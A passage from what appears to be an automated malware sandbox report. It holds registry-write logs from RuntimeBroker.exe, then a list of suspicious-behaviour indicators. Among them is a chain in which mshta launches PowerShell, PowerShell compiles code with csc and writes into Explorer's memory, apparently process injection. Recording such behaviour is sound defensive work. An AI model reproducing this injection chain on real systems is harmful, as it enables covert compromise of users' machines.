= "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a81b36d9e8e2df21b0ad71fb4f1c0ee88658c75432b48db5c14fd0e27767bad4" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d9fd67b5f3f5d901f972bbb5f3f5d901f972bbb5f3f5d901054406000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000373236313062643065326132303365363134343030643462336665636334646264376537653363353338346132333535303461623534316363376337383661330000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000a70e2201370032003600310030006200640030006500320061003200300033006500360031003400340030003000640034006200330066006500630063003400640062006400370065003700650033006300350033003800340061003200330035003500300034006100620035003400310063006300370063003700380036006100330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37323631306264306532613230336536313434303064346233666563633464626437653765336335333834613233353530346162353431636337633738366133000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228f82b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228f82b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6291cda5-2b0b-413b = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\00fa2fec54fb1ee7993c26bea4f47e9633257cc7b2b55ba1f8cba89200898c02" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2384002f-80ef-4a2c = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007315ffb4f3f5d9017315ffb4f3f5d9017315ffb4f3f5d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000363130376639636230383938313266356133386337373165363231343163633834616661306239353336346337313465616236623638663037323462643966320000b20009000400efbe43574d6243574d622e000000000000000000000000000000000000000000000000008d3fcc00360031003000370066003900630062003000380039003800310032006600350061003300380063003700370031006500360032003100340031006300630038003400610066006100300062003900350033003600340063003700310034006500610062003600620036003800660030003700320034006200640039006600320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36313037663963623038393831326635613338633737316536323134316363383461666130623935333634633731346561623662363866303732346264396632000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228a82b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228a82b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6291cda5-2b0b-413b = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000050f2b9b4f3f5d90150f2b9b4f3f5d90150f2b9b4f3f5d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000303066613266656335346662316565373939336332366265613466343765393633333235376363376232623535626131663863626138393230303839386330320000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000b0621101300030006600610032006600650063003500340066006200310065006500370039003900330063003200360062006500610034006600340037006500390036003300330032003500370063006300370062003200620035003500620061003100660038006300620061003800390032003000300038003900380063003000320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30306661326665633534666231656537393933633236626561346634376539363333323537636337623262353562613166386362613839323030383938633032000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228782b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228782b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2384002f-80ef-4a2c RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a51a5bf5-30a3-45a0 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fb916ea-da0d-4447 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\72610bd0e2a203e614400d4b3fecc4dbd7e7e3c5384a235504ab541cc7c786a3" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e = d01c46b6f3f5d901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\76ce1ea3-145f-4d9a = d8d7a4b4f3f5d901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cb2ab5af-5b75-4dc3 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a51a5bf5-30a3-45a0 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000093c14db5f3f5d9011a23adb5f3f5d9011a23adb5f3f5d901061107000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574c622000613831623336643965386532646632316230616437316662346631633065653838363538633735343332623438646235633134666430653237373637626164340000b20009000400efbe43574c6243574c622e0000000000000000000000000000000000000000000000000009e50f00610038003100620033003600640039006500380065003200640066003200310062003000610064003700310066006200340066003100630030006500650038003800360035003800630037003500340033003200620034003800640062003500630031003400660064003000650032003700370036003700620061006400340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61383162333664396538653264663231623061643731666234663163306565383836353863373534333262343864623563313466643065323737363762616434000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228e82b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228e82b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4170168b-4bb9-425f RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4170168b-4bb9-425f = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000079ad78b5f3f5d901f972bbb5f3f5d901f972bbb5f3f5d9014c0a05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000633638356337366366613138333634316661326436653662303764393537623433343464626235383064626330623336653038336131646566623861663664330000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000bcecfb00630036003800350063003700360063006600610031003800330036003400310066006100320064003600650036006200300037006400390035003700620034003300340034006400620062003500380030006400620063003000620033003600650030003800330061003100640065006600620038006100660036006400330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63363835633736636661313833363431666132643665366230376439353762343334346462623538306462633062333665303833613164656662386166366433000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763229082b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763229082b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 4240 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
client.exepowershell.exeExplorer.EXEpid process 5024 client.exe 5024 client.exe 3124 powershell.exe 3124 powershell.exe 3124 powershell.exe 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3236 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3124 powershell.exe 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 4136 cmd.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exesvchost.exedescription pid process Token: SeDebugPrivilege 3124 powershell.exe Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3692 RuntimeBroker.exe Token: SeManageVolumePrivilege 2396 svchost.exe Token: SeShutdownPrivilege 3692 RuntimeBroker.exe Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3236 Explorer.EXE 3236 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3236 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3236 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4792 wrote to memory of 3124 4792 mshta.exe powershell.exe PID 4792 wrote to memory of 3124 4792 mshta.exe powershell.exe PID 3124 wrote to memory of 4280 3124 powershell.exe csc.exe PID 3124 wrote to memory of 4280 3124 powershell.exe csc.exe PID 4280 wrote to memory of 3028 4280 csc.exe cvtres.exe PID 4280 wrote to memory of 3028 4280 csc.exe cvtres.exe PID 3124 wrote to memory of 3424 3124 powershell.exe csc.exe PID 3124 wrote to memory of 3424 3124 powershell.exe csc.exe PID 3424 wrote to memory of 2948 3424 csc.exe cvtres.exe PID 3424 wrote to memory of 2948 3424 csc.exe cvtres.exe PID 3124 wrote to memory of 3236 3124 powershell.exe Explorer.EXE PID 3124 wrote to memory of 3236 3124 powershell.exe Explorer.EXE PID 3124 wrote to memory of 3236 3124 powershell.exe Explorer.EXE PID 3124 wrote to memory of 3236 3124 powershell.exe Explorer.EXE PID 3236 wrote to memory of 3692 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3692 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3692 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3692 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 4036 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 4036 3236 